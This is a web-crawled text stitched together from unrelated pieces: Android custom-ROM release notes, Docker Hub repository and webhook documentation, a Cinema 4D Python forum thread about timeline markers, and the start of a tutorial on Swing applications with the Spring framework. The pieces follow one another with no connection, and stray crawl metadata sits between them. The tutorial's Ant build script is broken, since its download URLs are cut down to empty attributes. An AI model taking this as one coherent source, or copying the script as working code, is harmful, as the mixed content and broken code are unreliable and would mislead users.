_Proper ROOT and installation steps.
_All options of Euphoria Control works.
_Market Fixed.
Beta 1 (18/3/2012):
Initial Release
Stunner Mods/Themes:
_Various Transitions by tremerone
_Recent Apps Mod by Matius444
_Themes by m3dd0g
Useful Links:
_ICS LP1 Direct Link
_ICS LP1 Repack and TriangleAway
_ICS Modems LP5 and LP6
_Apps for Tablet Mode
Fixes:
_SystemUI Crash Fix in Tablet Mode
_160 dpi Phone apk crash
_Random Reboots
_Sleep of Death
Tip #1: Switch between Tablet/PhoneUI, the easy way..
To get tablet mode on ICS Stunner, please follow these steps:
Settings > Euphoria Control > General UI > Switch Tablet/PhoneUI > Custom > 200 (Tablet) > Reboot.
After Reboot, go to Apex Launcher Settings and set grid size to 6x6 or 6x5 to enjoy full screen accommodation of icons.
If you still don't get Tablet Mode, that means your device isn't rooted properly and you need to clean install this ROM.
It is important to follow the steps mentioned there carefully.
Tip #2: Getting vibrant colors on screen.. the awesome AMOLED
Settings > Galaxy Note Settings > Screen Tab > Mode > DYNAMIC
This setting would give you stunning vibrant colors. Try it.
Repositories on Docker Hub
Docker Hub repositories let you share images with co-workers, customers, or the Docker community at large. If you’re building your images internally, either on your own Docker daemon, or using your own Continuous integration services, you can push them to a Docker Hub repository that you add to your Docker Hub user or organization account.
Alternatively, if the source code for your Docker image is on GitHub or Bitbucket, you can use an “Automated build” repository, which is built by the Docker Hub services. See the automated builds documentation to read about the extra functionality provided by those services.
Searching for images
You can search the Docker Hub registry via its search interface or by using the command line interface. Searching can find images by image name, user name, or description.
Viewing repository tags
Docker Hub’s repository “Tags” view shows you the available tags and the size of the associated image.
Image sizes are the cumulative space taken up by the image and all its parent
images. This is also the disk space used by the contents of the Tar file created
when you
docker save an image.
Creating a new repository on Docker Hub
When you first create a Docker Hub user, you will have a “Get started with Docker Hub.” screen, from which you can click directly into “Create Repository”. You can also use the “Create ▼” menu to “Create Repository”.
When creating a new repository, you can choose to put it in your Docker ID
namespace, or that of any organization that you are in the “Owners”
team. The Repository Name will need to be unique in that namespace, can be two
to 255 characters, and can only contain lowercase letters, numbers or
- and
_.
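The naming rule just stated can be captured in a quick check (a hypothetical helper for illustration, not part of any Docker tooling):

```python
import re

# Encodes the rule above: 2 to 255 characters, only lowercase
# letters, digits, '-' and '_'.
_REPO_NAME = re.compile(r"^[a-z0-9_-]{2,255}$")

def is_valid_repo_name(name):
    return bool(_REPO_NAME.match(name))

print(is_valid_repo_name("my-app_2"))  # True
print(is_valid_repo_name("MyApp"))     # False (uppercase not allowed)
print(is_valid_repo_name("a"))         # False (too short)
```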
The “Short Description” of 100 characters will be used in the search results, while the “Full Description” can be used as the Readme for the repository, and can use Markdown to add simple formatting.
After you hit the “Create” button, you then need to
docker push images to that
Hub based repository.
Pushing a repository image to Docker Hub
In order to push a repository to the Docker Hub, you need to
name your local image using your Docker Hub username, and the
repository name that you created in the previous step.
You can add multiple images to a repository, by adding a specific
:<tag> to
it (for example
docs/base:testing). If it’s not specified, the tag defaults to
latest.
You can name your local images either when you build it, using
docker build -t <hub-user>/<repo-name>[:<tag>],
by re-tagging an existing local image
docker tag <existing-image> <hub-user>/<repo-name>[:<tag>],
or by using
docker commit <exiting-container> <hub-user>/<repo-name>[:<tag>] to commit
changes.
Now you can push this repository to the registry designated by its name or tag.
$ docker push <hub-user>/<repo-name>:<tag>
The image will then be uploaded and available for use by your team-mates and/or the community.
Stars
Your repositories can be starred and you can star repositories in return. Stars are a way to show that you like a repository. They are also an easy way of bookmarking your favorites.
Comments
You can interact with other members of the Docker community and maintainers by leaving comments on repositories. If you find any comments that are not appropriate, you can flag them for review.
Collaborators and their role
A collaborator is someone you want to give access to a private repository. Once
designated, they can
push and
pull to your repositories. They will not, however, be able to perform any administrative tasks such as deleting the repository or changing its status from private to public.
Private repositories
Private repositories allow you to have repositories that contain images that you want to keep private, either to your own account or within an organization or team.
To work with a private repository on Docker Hub, you will need to add one using the Add Repository button. You get one private repository for free with your Docker Hub user account (not usable for organizations you’re a member of). If you need more accounts you can upgrade your Docker Hub plan.
Once the private repository is created, you can
push and
pull images to and
from it using Docker.
Note: You need to be signed in and have access to work with a private repository.
Private repositories are just like public ones. However, it isn’t possible to browse them or search their content on the public registry. They do not get cached the same way as a public repository either.
It is possible to give access to a private repository to those whom you designate (i.e., collaborators) from its “Settings” page. From there, you can also switch repository status (public to private, or vice-versa). You will need to have an available private repository slot open before you can do such a switch. If you don’t have any available, you can always upgrade your Docker Hub plan.
Webhooks
A webhook is an HTTP call-back triggered by a specific event. You can use a Hub repository webhook to notify people, services, and other applications after a new image is pushed to your repository (this also happens for Automated builds). For example, you can trigger an automated test or deployment to happen as soon as the image is available.
To get started adding webhooks, go to the desired repository in the Hub, and
click “Webhooks” under the “Settings” box. A webhook is called only after a
successful
push is made. The webhook calls are HTTP POST requests with a JSON
payload similar to the example shown below.
Example webhook JSON payload:
{
  "push_data": {
    "pushed_at": 1.417566822e+09,
    "pusher": "svendowideit"
  },
  "repository": {
    "comment_count": 0,
    "date_created": 1.417566665e+09,
    "description": "",
    "full_description": "webhook triggered from a 'docker push'",
    "is_official": false,
    "is_private": false,
    "is_trusted": false,
    "name": "busybox",
    "namespace": "svendowideit",
    "owner": "svendowideit",
    "repo_name": "svendowideit/busybox",
    "repo_url": "",
    "star_count": 0,
    "status": "Active"
  }
}
Note: If you want to test your webhook, we recommend using a tool like requestb.in. Also note, the Docker Hub server can’t be filtered by IP address.
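As a sketch of what a webhook receiver might do with such a payload, here is a minimal standard-library example (the field names follow the payload above; the receiver itself and its return shape are hypothetical):

```python
import json

def summarize_push(payload_text):
    # Pull out the fields a notification service typically needs
    payload = json.loads(payload_text)
    repo = payload["repository"]
    return {
        "repo": repo["repo_name"],
        "pusher": payload["push_data"]["pusher"],
        "private": repo["is_private"],
    }

example = json.dumps({
    "push_data": {"pushed_at": 1.417566822e+09, "pusher": "svendowideit"},
    "repository": {"repo_name": "svendowideit/busybox", "is_private": False},
})
print(summarize_push(example))
# {'repo': 'svendowideit/busybox', 'pusher': 'svendowideit', 'private': False}
```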
Webhook chains
Webhook chains allow you to chain calls to multiple services. For example, you can use this to trigger a deployment of your container only after it has been successfully tested, then update a separate Changelog once the deployment is complete. After clicking the “Add webhook” button, simply add as many URLs as necessary in your chain.
The first webhook in a chain will be called after a successful push. Subsequent URLs will be contacted after the callback has been validated.
Validating a callback
In order to validate a callback in a webhook chain, you need to
- Retrieve the callback_url value in the request's JSON payload.
- Send a POST request to this URL containing a valid JSON body.
Note: A chain request will only be considered complete once the last callback has been validated.
To help you debug or simply view the results of your webhook(s), view the “History” of the webhook available on its settings page.
Callback JSON data
The following parameters are recognized in callback data:
state (required): Accepted values are success, failure, and error. If the state isn't success, the webhook chain will be interrupted.
description: A string containing miscellaneous information that will be available on Docker Hub. Maximum 255 characters.
context: A string containing the context of the current status. Maximum 100 characters.
target_url: The URL where the results of this action will be found.
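A chain participant might assemble its callback body along these lines (a sketch; the field names follow the list above, and only state is required — an unknown state value is rejected here because it would interrupt the chain):

```python
import json

VALID_STATES = {"success", "failure", "error"}

def build_callback_body(state, description="", target_url=None):
    # 'state' is required; anything other than "success" interrupts the chain
    if state not in VALID_STATES:
        raise ValueError("state must be one of: success, failure, error")
    body = {"state": state, "description": description}
    if target_url is not None:
        body["target_url"] = target_url
    return json.dumps(body)

print(build_callback_body("success", "387 tests PASSED"))
# {"state": "success", "description": "387 tests PASSED"}
```

The resulting body would then be POSTed to the callback_url found in the webhook payload.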
I have a python generator with two integers as user data. The two integer sliders control the start and length of a timeline marker. Currently the timeline markers only update to the new integer value on mouse-up. However I would like the timeline markers to update on each value change as the user slides the integer.
How is this possible? I have been trying different messaging and event add techniques but not finding a solution. Thank You for any help.
Hi,
you should show us some code, it is really hard to tell what you are doing otherwise.
Note that the Python Generator's main() function is bound by threading limitations.
The appropriate choice to force a redraw of managers is usually c4d.GeSyncMessage().
Cheers
zipit
hello,
On your generator you can create the Message function and react accordingly.
To check if the marker already exists, the most direct and easiest way is to use its name.
you can find other ids you can use on this page
This is a basic example, you may want to add some extra functionalities.
import c4d

def FindMarker(timeOfMarker, name):
    # Retrieves the first marker of the document
    fm = c4d.documents.GetFirstMarker(doc)
    # For each marker, compare its name
    while fm:
        if fm.GetName() == name:
            return fm
        fm = fm.GetNext()
    return None

def RemoveAndCreate(timeOfMarker, name):
    # Checks if the marker already exists (compare by name)
    mark = FindMarker(timeOfMarker, name)
    # Removes the marker if it exists
    if mark is not None:
        mark.Remove()
    # Creates and returns the new marker
    return c4d.documents.AddMarker(doc, None, timeOfMarker, name)

def message(id, data):
    # If User Data are changed
    if id == c4d.MSG_DESCRIPTION_VALIDATE:
        # Retrieves the User Data values
        fmt = op[c4d.ID_USERDATA, 1]
        smt = op[c4d.ID_USERDATA, 2]
        # Creates the markers (removes the existing ones first)
        RemoveAndCreate(fmt, "First Marker")
        RemoveAndCreate(smt, "Second Marker")
        c4d.EventAdd()
    return True

def main():
    pass
Cheers
Manuel
Thank You @m_magalhaes and @zipit
Both your suggestions were very helpful. The controller works very well, @m_magalhaes; I just needed to convert my user data input to BaseTime and it works perfectly.
I was able to solve the updating issue to work how I want. I only needed to add:
c4d.GeSyncMessage(c4d.EVMSG_TIMECHANGED)
Now my timeline markers update nicely as I change values.
This topic can be marked solved. | https://plugincafe.maxon.net/topic/11839/update-timeline-markers-on-user-data-slider-input | CC-MAIN-2021-31 | refinedweb | 428 | 58.58 |
This guide provides instructions on how to consume or use SAP BRMS in EJB.
Applies to:
This document holds good for all CE 7.3 SPxx. This method can also be used for older versions of CE (CE 7.1 SP01 onwards), with some differences in content.
Summary:
This guide describes, step by step, how to return a single value and multiple values from a Decision Table. To explain this, we are using 2 examples of how to read SAP BRMS in EJB.
Example 1 : Single set of values Returned.
Example 2 : Multiple List of values Returned.(How to consume or use SAP BRMS in EJB Part 2.)
We will be discussing following points in detail in this document –
- How to create & use EJB DTO inside BRMS.
- How to use “EngineInvoker” class file.
- How to call the rules from EJB.
- How to read the response received from BRMS.
- How to test the rules service.
Special thanks to Samudra Gupta for his guidance in documenting the process.
Example : Based on the entered plant & product code, the delivery plant is to be determined.
Step 1 : Create a DTO called “Plant” as shown below:
import java.io.Serializable;

public class Plant implements Serializable {

    private static final long serialVersionUID = -3420223731187536617L;

    private String plant;
    private String productCode;
    private String deliveryPlantList;

    public String getPlant() {
        return plant;
    }

    public void setPlant(String plant) {
        this.plant = plant;
    }

    public String getProductCode() {
        return productCode;
    }

    public void setProductCode(String productCode) {
        this.productCode = productCode;
    }

    public String getDeliveryPlantList() {
        return deliveryPlantList;
    }

    public void setDeliveryPlantList(String deliveryPlantList) {
        this.deliveryPlantList = deliveryPlantList;
    }
}
Step 2: Expose the Class file in public Parts as shown below:
- Right-click on the EJB project. Click on “Development Component”. Click on “Show In”. Select “Component Properties”.
- On selecting “Component Properties”, the tab shown below opens up. Click on “Public Parts”. Right-click on “Client” and select “Manage Entities”.
- On selecting “Manage Entities”, the pop-up below opens up. Click on “Java Class”. Click on the package “dto”. Select Plant and click on Next or Finish.
- On click of Finish, the Plant is added to the public part as shown below:
- Repeat steps 2 & 3 for “ejbjar” and the Plant will be added to the public part as shown below:
Step 3 : Build the test/ejb/module and add it in “Dependencies” of “test/rules”. Only “Design Time” is required.
Step 4 : Go to the rules project and add the dto class.
- Open “Project Resource”. Click on the “Aliases” tab. Click on Add.
- On Click of “Add” the below pop Up opens up. Select the “Class” Option.
- On Selecting Class another pop up opens up which looks as shown below. Open the Package select the “Plant” . Click on the arrow to add in the Selected Class. It will appear as shown below. Finally click on Finish.
- On Clicking of “Finish” the Plant gets added in the “Alias Name” List. Expand it and rename “Plant.getPlant” with “EnteredPlant” & “Plant.getProductCode” with “ProductCode”.
Step 5 : Now Right Click on “Rules Modeling” & Select “New Ruleset”.
Step 6 : On selecting “New Ruleset”, a pop-up opens up as shown below. Enter a name for the rule set, like “DeliveryPlantRuleset”.
Step 7 : On clicking “OK”, we get a new Rule Set created as shown below:
Step 8 : Creation of Rules & Decision Table.
- To create a “Decision Table”, we have 2 processes:
- Right Click on “Decision Table” and select “New Decision Tables…”.
- Open “DeliveryPlantRuleset”. Click on “Decision Table” Tab. Click on “New” button.
- On selecting either of the methods, we get the pop-up below. Enter the “Decision Table Name” & “Comments”. Click on “Next”.
- On click of “Next”, the pop-up changes and looks as shown below. Select “EnteredPlant” & “ProductCode” from the Available Conditions and add them to the Selected Conditions. (In our scenario we do not have any horizontal condition or other condition.) Click on “Next”.
- On click of “Next”, the pop-up changes and looks as shown below. Select “Plant.setDeliveryPlantList({String})” from the Available Actions and add it to the Selected Actions. (In our scenario we do not have any other action.) Click on “Finish”.
- On click of Finish, the “Decision Table” is created and looks as shown below. Add the values at build time, or you can add values directly in Rules Manager later on. To know how, click here. (Note: the upload and download of Decision Tables is not available in older versions.)
- To create a “Rule” we have 2 process to create new “Rule”
- Right Click on “Rules” and select “New Rule…”.
- Open “DeliveryPlantRuleset”. Click on “Rules” Tab. Click on “New” button.
- On selecting either of the method we get the below pop up. Enter the “Rules Name”. Click on “OK”.
- On Click Of “OK” the following is visible. In Our example we only have one rule and one decision table so we set a default condition and a default action as shown in the below.
Step 9 : Enter some dummy values in the Decision Table as shown below. Save it build and deploy “test/ejb/app” & “test/rules” in sequence.
Step 10 : Calling the Rule from “test/ejb/module”.
- Create a Java Class Called “EngineInvoker” and copy past the code in Appendix 1
- Create a “Session Bean” in “test/ejb/module” with the name “DeliveryPlantRules”.
- Copy past the code in Appendix 2 in the “Session Bean” in “test/ejb/module” with the name “DeliveryPlantRules”.
- The Code in line 24 in Appendix 2 is displayed below. there are 3 inputs to the method
- Right Click on the “Session Bean” “DeliveryPlantRules” and Create Web service by following the steps shown in the sequence of screen shot.
Step 11 : Build the dc’s “test/ejb/module” & “test/ejb/app”. Deploy the dc “test/ejb/app“.
Step 12 : Go to http://<Server>:<port>/wsnavigator and test the service be entering the “Plant” & “Product Code” you will get back the Plant DTO with the entered values along with “Delivery Plant”.
Appendix 1 : EngineInvoker.java Class file code.
import java.io.Serializable; import java.util.ArrayList; import java.util.List; import javax.naming.InitialContext; import javax.rmi.PortableRemoteObject; import com.sap.brms.qrules.ejb.RuleEngineHome; import com.sap.brms.qrules.engine.RuleEngine; import com.sap.tc.logging.Location; public class EngineInvoker { static Location logger = Location.getLocation(EngineInvoker.class); private static String jndiName = "com.sap.brms.RuleEngine"; public static RuleEngine getRuleEngine() throws Exception { InitialContext context = new InitialContext(); Object obj = context.lookup(jndiName); RuleEngineHome home = (RuleEngineHome) PortableRemoteObject.narrow(obj,RuleEngineHome.class); return (RuleEngine) home.create(); } @SuppressWarnings("unchecked") public static List<String> invokeRuleset(String projectName, String rsName,List<Serializable> input) { logger.debugT("start:invokeRuleset"); List output = new ArrayList(); RuleEngine ruleEngine; if (projectName == null || rsName == null || input == null) { output.add("Project Name or Ruleset Name or Payload should not be NULL"); } try { ruleEngine = getRuleEngine(); output = ruleEngine.invokeRuleset(projectName, rsName, input); } catch (Exception e) { logger.errorT("error occured:"+e.getMessage()); e.printStackTrace(); } logger.debugT("start:invokeRuleset"); return output; } }
Appendix 2 : DeliveryPlantRules.java Class file code.
import java.io.Serializable; import java.util.ArrayList; import java.util.List; import javax.ejb.Stateless; import util.EngineInvoker; import com.sap.tc.logging.Location; import dto.Plant; @Stateless public class DeliveryPlantRules implements DeliveryPlantRulesLocal { static Location logger = Location.getLocation(DeliveryPlantRules.class); @SuppressWarnings("unchecked") public Plant getDeliveringPlantForProductsRules(Plant plant){ logger.debugT("start:getRullesData"); List<Serializable> ilist = new ArrayList<Serializable>(); ilist.add(plant); Object object = new Object(); if (ilist.size() != 0) { List output = EngineInvoker.invokeRuleset("demo.sap.com~test~rules", "DeliveryPlantRuleset", ilist); if (output.size() != 0) { object = output.get(0); } } else { object = "Input has not been set."; } logger.debugT("end:getRullesData"); if (object instanceof Plant) { return (Plant) object; } return null; } }
Nice Document !!!
Hi Abhijeet,
Thanks & Happy to Help
Nicely Explained !!
Hi Umasankar,
Thanks for appreciating.
Regards
Piyas
Hi Piyas,
Nice & Helpful Doc….
Very Good.
Keep Up the Good Work.
Regards
Avi
Hi Piyas,
Nice document!! Keep up the good work.
Cheers
Adrian
Thanks for the encouragement Adrian
Cheers
Piyas
Hello Piyas,
Nice Document…….Keep up the great work and keep sharing.
Regrds
Kumar D | https://blogs.sap.com/2013/12/27/how-to-consume-or-use-sap-brms-in-ejb-part-1/ | CC-MAIN-2017-30 | refinedweb | 1,330 | 53.98 |
## merge_closest ### Merge column(s) into DataFrame using closest-without-going-over lookup.
The merge_closest function mimics Excel’s VLOOKUP function in approximate match (range lookup) mode, with added benefits of ensuring the lookup table is sorted and merging any subset of columns from the lookup table. It’s similar to a left join based on the lookup_field value that is closest to the data_field value without going over. Only the first matching row from lookup is merged; if lookup_field contains duplicates, it’s up to the user to drop duplicates in advance as appropriate. For any row in data whose data_field value is less than all values in lookup_field, lookup values in result will be missing.
By default, all columns in lookup other than lookup_field will be merged with data. A specific list of columns from lookup to include or exclude can be passed. If both include_cols and exclude_cols are provided, exclude_cols is ignored. To include lookup_field in result, lookup_field must be passed in include_cols, perhaps as include_cols=lookup.columns.
### This is my first Python package and first GitHub repo…
…and any comments or suggestions are most welcome.
### Use
from merge_closest import merge_closest
- merge_closest(data, lookup, data_field, lookup_field,
- include_cols=None, exclude_cols=None, presorted=False)
### Parameters
`data` : pandas DataFrame
`lookup` : pandas DataFrame
`data_field` : name of column in data
`lookup_field` : name of column in lookup
### Returns
`result` : pandas DataFrame. | https://pypi.org/project/merge_closest/ | CC-MAIN-2017-09 | refinedweb | 227 | 51.68 |
Interpolation
To check for maximum bending stress in flat plates — this for a hanger clamp, Roark’s formulas are handy. Here’s a table that offers a recipe.
Manually, this is straightforward: First, I calculate the aspect ratio (a / b) of the flat plate, and then pick a value of β1 that corresponds to the ratio. If I do not find a ready match, then I perform a linear interpolation between the two values that form the intermediate lower and upper boundaries of (a / b).
For example, if my plate size is 200×100, then (a / b) is 2.0 (in the sixth column), whose corresponding β1 would then be equal to 1.226.
But if my plate size is 220×100, then (a / b) becomes 2.2. Now, the nearest lower and upper boundary values in the table are 2.0 and 3.0 respectively. Since Roark’s table does not readily offer a corresponding β1 value, this further requires interpolation — let’s stick to linear, for simplicity.
$$ \frac{p}{q} = \frac{P}{Q} $$
$$ p = \frac{P \cdot q}{Q} $$
$$ = \frac{(2.106 - 1.226) \cdot (2.2 - 2.0)}{(3.0 - 2.0)} $$
$$ \therefore \beta_1 = 1.226 + p $$
How to automate this in python? Here’s one way:
from bisect import bisect # Roark's Table 11.4, Case 10, with three edges fixed # a / b, and b1 are defined as lists below: raob = [0.25, 0.50, 0.75, 1.00, 1.50, 2.00, 3.00] b1 = [0.020, 0.081, 0.173, 0.321, 0.727, 1.226, 2.105] a, b = input("Enter a, b: ") a, b = float(a), float(b) aob = a / b try: i = raob.index(aob) beta1 = b1[i] except ValueError: # aob did not match any value in raob i = bisect(raob, aob) j = i - 1 P = b1[i] - b1[j] q = (aob - raob[j]) Q = (raob[i] - raob[j]) beta1 = b1[j] + (P * q / Q) finally: print "a/b : ", round(aob, 3) print "Index of a/b ratio: ", i print "beta1 : ", round(beta1, 3) pass
And here’s how the above code works:
- First, I import
bisectstandard library for referencing across two lists (
raob, and
b1).
- Get user input for plate size in terms of
a(length) and
b(width).
- Then, in the
trystatement, I attempt to find the index,
i(column number) that matches the aspect ratio (a / b).1 Finding the index is key, which lets me refer to the corresponding value in the second list.
- If an exact numerical match of (a / b) ratio is not found in the
raoblist, then the control jumps to process the
except ValueErrorpart.
- Using
bisect, I try and find the nearest next numerical value and its corresponding index number. So to take the aforementioned example, if my (a / b) ratio turns out to be 2.2, then the next numerical value that bisect finds for me is 3.0, and its corresponding i value, which is 6 in this case.2
- Rest of the code thereafter deals with linear interpolation between two limits (2.0 and 3.0 in this case, and their corresponding β1 values) to get the β1 value (corresponding to 2.2 in this example); and then print those values.
The only shortcut I’ve taken in this crude — doesn’t-catch-all-errors — code yet I think, is in the exception part. I’ve used that to move the control from simply throwing up
ValueError to the next part of the code where the interpolation occurs. (Note: I haven’t addressed the
IndexError that would occur — when the ratio is either lower than 0.25 or greater than 3.0 — in this code.) Until I work out a more elegant way to do the above, this I think will do for now.
For instance, the index of 0.75 in the
raoblist is 2. (Index numbers in python start with 0, not 1.) ↩
For tracing index, and the subsequent interpolation, I preferred using
bisectfrom the standard library (instead of using a custom package like
numpythat comes with better interpolation tools), so I could keep the number of dependencies (and package installation requirements) to a minimum in order to run this code. Without having to resort to using a sledge hammer to kill a mosquito, I’m happy with it so far. ↩ | http://ckunte.net/2011/interpolation | CC-MAIN-2020-05 | refinedweb | 723 | 72.87 |
What Does Internal Rate of Return Mean?
The discount rate often used in capital budgeting that makes the net present value of all cash flows from a particular project equal to zero. Generally, the higher a project's internal rate of return is, the more desirable it is to undertake. Thus, IRR can be used to rank potential projects. Assuming all factors are equal, the project with the highest IRR probably would be considered the best and would be undertaken first. IRR sometimes is referred to as the economic rate of return (ERR).
Investopedia explains Internal Rate of Return
One can think of IRR as the rate of growth a project is expected to generate. Although the actual result may differ from the estimated IRR rate, a project with a substantially higher IRR value than other available options still will provide a much better chance for strong growth. IRRs also can be compared against prevailing rates of return in the securities market. If a firm cannot find any projects with IRRs greater than the returns that can be generated in the financial markets, it may choose to invest its retained earnings in the market.
Related Terms: • Discount Rate • Discounted Cash Flow—DCF• Interest Rate • Modified Internal Rate of Return—MIRR • Present Value Interest Factor—PVIF | http://financial-dictionary.thefreedictionary.com/IRR | crawl-003 | refinedweb | 215 | 60.45 |
Before you start
About this tutorial
This tutorial will help you learn the basics of the Spring framework for application development, using Swing, and dependency injection, also known as Inversion of Control (IOC). After a brief overview of Spring and dependency injection, the bulk of the tutorial is hands-on, walking you step-by-step through creating a fully functional Swing application -- a to-do list program -- using Spring. The walk-through includes three options for a build environment, with detailed setup instructions for each one. You'll learn the basic use and benefits of the Spring framework in the process. Explanations of other relevant concepts are included along the way. You'll also take a few side trips to learn some good programming practices in the context of the tutorial code.
The last section is a brief and high-level review of the Spring Rich Client (RCP) framework, a subproject of the Spring framework that's working to provide a platform for developing rich-client Swing applications under Spring. The tutorial does not include step-by-step instructions for using the Spring RCP but is a starting point for obtaining the source code and exploring the project on your own.
The tutorial shows each new piece of code that you need to type. The complete source code is also available (see Download). The downloadable source code was created by following along and pasting code directly from the tutorial, so it should be bug-free and identical to what you create as you follow along. Because you'll write the GUI application in the Java programming language, it will run on any platform that Java code runs on.
This tutorial is not intended to be a comprehensive overview of the Spring framework or Swing. It does not cover use of Spring to create Web applications or access databases, or more-advanced topics such as Spring's support for aspect-oriented programming (AOP). Explore the tutorial's Resources for books, articles, tutorials, and online references that cover Spring and Swing in greater breadth and detail.
Prerequisites
The audience for this tutorial is Java developers. It is intended to be accessible to multiple experience levels, and even if you are familiar with one topic you might still learn something about another. Some sections discuss related design patterns and development approaches. Feel free to skim past these if you are uninterested or already familiar with them. The following knowledge and skill levels will be helpful:
- Familiarity with the basics of the Java programming language, conventions for Java bean components, and experience with basic application design and development in the Java language.
- Basic knowledge of some build environment -- either Eclipse, Apache Ant, or Apache Maven (see Resources). But even if you are unfamiliar with these environments, you can follow the tutorial's fairly detailed instructions for using them. If you have problems with one, you can try one or both of the other two.
- Basic knowledge of XML syntax -- elements, attributes, and how to maintain a well-formed XML document (see Resources).
- Some basic familiarity with the Swing API, although the tutorial attempts to avoid the use of complex Swing code.
You need a computer with a JDK installed (JDK 1.5 is required to run the Rich Client Project demo in the final section) and an Internet connection for downloading the required tools and libraries.
One of the following is required, or you can use your own build environment or IDE:
- Apache Ant Version 1.6.1 or higher, available at
- Apache Maven Version 1.0.2 or higher, available at
- Eclipse version 3.0, 3.1, or higher, available at
Options for downloading required dependency JARs
In order to minimize the amount of up-front downloading work required to start the tutorial, both the Ant and Maven build scripts in the tutorial's source code provide support for automatically downloading the required dependency JARs (including Spring itself) from public repositories. This feature is built into Maven, and it is provided in the Ant script by the
get-dependencies target. To use these features with Eclipse, you must have Ant or Maven installed. You'll find more details in Environment setup.
You can obtain the correct required JAR versions manually if you prefer. Just refer to the
get-dependencies target in the Ant build.xml file (see Listing 1) to find out which JARs and versions are required, as well as the URLs to download them from.
Overview of Spring and dependency injection
What is the Spring framework?
The Spring framework Web site welcomes visitors with this description: "As the leading full-stack Java/J2EE application framework, Spring delivers significant benefits for many projects, reducing development effort and costs while improving test coverage and quality" (see Resources). This generic statement is an indicator of Spring's scope and size. Simply put, Spring provides many tools and approaches that make it easier to write and test Java and J2EE applications. This tutorial only illustrates basic use of dependency injection, but Spring contains many useful and easy-to-use wrappers for other services and frameworks, as well as advanced features such as support for aspect-oriented programming (AOP) (see Resources).
For more overview and background information on Spring, check out the project's mission statement, The Spring series on developerWorks, and other articles in Resources.
What is dependency injection?
Dependency Injection (DI), also referred to as Inversion of Control (IOC), is an approach to software development in which a separate object or framework (such as the Spring framework) is responsible for creating and "injecting" objects into other objects that depend on them. This results in code that is loosely coupled and easy to test and reuse.
Check out Martin Fowler's site for some good descriptions of DI/IOC (see Resources).
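A minimal sketch in Java can make this concrete. The class names below (MessageSource, Greeter, and so on) are invented for illustration and are not part of the tutorial's to-do application:

```java
// Without DI, Greeter would construct its own MessageSource (tight
// coupling). With DI, the dependency is created elsewhere and passed in,
// so Greeter can be tested with a stub and reused with other
// implementations.
interface MessageSource {
    String getMessage();
}

class FixedMessageSource implements MessageSource {
    public String getMessage() { return "hello"; }
}

class Greeter {
    private final MessageSource source;

    // The dependency is "injected" through the constructor; Greeter never
    // instantiates a concrete MessageSource itself.
    Greeter(MessageSource source) { this.source = source; }

    String greet() { return "Greeting: " + source.getMessage(); }
}

public class DiSketch {
    public static void main(String[] args) {
        // Here the main method plays the role of the container. Spring
        // performs this same wiring from a bean-definition file instead
        // of hard-coded Java.
        Greeter greeter = new Greeter(new FixedMessageSource());
        System.out.println(greeter.greet());
    }
}
```

Because Greeter depends only on the MessageSource interface, a test can inject a stub implementation without touching any framework code; Spring simply automates the wiring step shown in main.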
Environment setup
Pick your build environment
Before you start coding the sample application, you need to set up an environment to build and run it. If you are experienced enough with Java programming to handle building and running on your own, you can skip to Creating the to-do list: Basic Swing and Spring application setup.
You have three options to choose from for a build environment (see Prerequisites). You can pick one that you're familiar with or try a new one to get some exposure to it. You can use any one or all three:
- Apache Ant: You can run the Ant build script from the command line (which requires that you download and install Ant) or from within an IDE (such as Eclipse).
- Apache Maven: Maven is a popular build environment. To use it, you must download and install it, but all of the required configuration files to build with Maven are included in the tutorial.
- Eclipse: Note that even if you use Eclipse to build and run, you still need to obtain the library JAR dependencies and then define references to these dependencies in your Eclipse classpath. You can use the Ant or Maven build script to auto-download the required dependencies to your local machine, or download them yourself. You'll find more details in Set up Eclipse.
Set up Ant
If you've chosen Ant as your build environment:
- Install Ant and ensure that the Ant executable is on your path.
- Type ant -version at the command line to verify that Ant is installed correctly. Alternatively, you can use Ant from within your IDE of choice or another tool.
- After you've configured Ant in your operating system or IDE, create a directory named todo. This directory will contain all your project files.
- Create the build.xml build script, shown in Listing 1, in the directory's root.
Note: For presentation purposes, some lines in the code listings are split at places where you wouldn't ordinarily split them. In some cases, such as Listing 1, this results in an invalid file that you must fix. In these situations, a NOTE is included inline in the code listing instructing you to delete the note and join the lines together with no spaces. (Ant appears to be smart enough to strip newlines and spaces from URLs, but it's better to make them look nice anyway.)
Listing 1. build.xml
<project name="todo" default="default">

    <property name="build.dir" location="build"/>
    <property name="lib.dir" location="lib"/>

    <path id="classpath">
        <pathelement location="${build.dir}"/>
        <fileset dir="${lib.dir}"/>
    </path>

    <target name="clean">
        <delete dir="${build.dir}"/>
    </target>

    <target name="get-dependencies">
        <mkdir dir="${lib.dir}"/>
        <get dest="${lib.dir}/commons-logging-1.0.3.jar"
             usetimestamp="true" ignoreerrors="true"
             src="
             NOTE: The URL in the lines above and below this note was split
             for readability. Delete this note and join the URL with no spaces
             commons-logging/jars/commons-logging-1.0.3.jar"/>
        <get dest="${lib.dir}/spring-1.2.3.jar"
             usetimestamp="true" ignoreerrors="true"
             src="
             NOTE: The URL in the lines above and below this note was split
             for readability. Delete this note and join the URL with no spaces
             springframework/jars/spring-1.2.3.jar"/>
    </target>

    <target name="compile">
        <mkdir dir="${build.dir}/classes"/>
        <javac srcdir="src" destdir="${build.dir}/classes"
               classpathref="classpath" encoding="UTF8"
               debug="on" deprecation="on"/>
        <copy todir="${build.dir}/classes" overwrite="true">
            <fileset dir="src">
                <include name="**/*.xml"/>
            </fileset>
        </copy>
    </target>

    <target name="run" depends="compile">
        <java classname="todo.ToDo" fork="true">
            <classpath>
                <path refid="classpath"/>
                <pathelement location="${build.dir}/classes"/>
            </classpath>
        </java>
    </target>

    <target name="default" depends="get-dependencies, compile, run"/>

</project>
Automatically downloading dependencies via Ant
Now, run the get-dependencies target, either by typing ant get-dependencies on the command line or by running the target in your IDE or editor. You should see output that looks like this:
Buildfile: build.xml

get-dependencies:
    [mkdir] Created dir: D:\projects\todo\lib
      [get] Getting: maven/commons-logging/jars/commons-logging-1.0.3.jar
      [get] Getting: springframework/jars/spring-1.2.3.jar

BUILD SUCCESSFUL
Total time: 30 seconds
You will be instructed to use other targets in the Ant script later in the tutorial. The main ones are clean, compile, and run, which behave like most standard Ant scripts.
Set up Maven
If you've chosen to use Maven as the build environment:
- Install Maven and ensure that the Maven executable is on your path. Refer to the documentation on the Maven site for more details (see Resources).
- Type maven -v at the command line to show the version and verify that Maven is installed correctly. You can use Maven from within Eclipse via an Eclipse or a Maven plug-in; see the Maven site for details.
- After you've configured Maven in your operating system or IDE, create a directory named todo. This directory will contain all your project files.
